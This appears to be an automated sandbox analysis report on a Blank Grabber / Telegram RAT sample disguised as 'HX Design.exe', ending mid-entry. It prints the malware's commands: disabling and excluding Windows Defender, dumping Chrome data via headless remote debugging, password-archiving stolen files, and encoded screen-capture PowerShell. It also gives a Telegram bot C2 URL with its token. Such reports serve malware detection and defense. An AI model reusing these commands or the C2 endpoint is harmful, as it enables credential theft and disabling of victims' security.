rar.exe (PID: 648 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 1908 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7588 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 1696 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2992 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 980 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7292 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 4924 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1668 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 4936 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7628 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7160 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

svchost.exe (PID: 7692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendMessage"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1678275226.000001631A8D6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.1678275226.000001631A8D4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HX Design.exe PID: 7508	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: HX Design.exe PID: 7524	JoeSecurity_GenericPythonStealer	Yara detected Generic Python Stealer	Joe Security
Process Memory Space: HX Design.exe PID: 7524	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: HX Design.exe PID: 7524	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HX Design.exe PID: 7524	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, ProcessId: 908, ProcessName: chrome.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", ProcessId: 7588, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7596, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *", ProcessId: 8032, ProcessName: cmd.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7588, StartAddress: 213032B0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 7588

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Browser Execution In Headless Mode

Source: Process started

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, ProcessId: 908, ProcessName: chrome.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 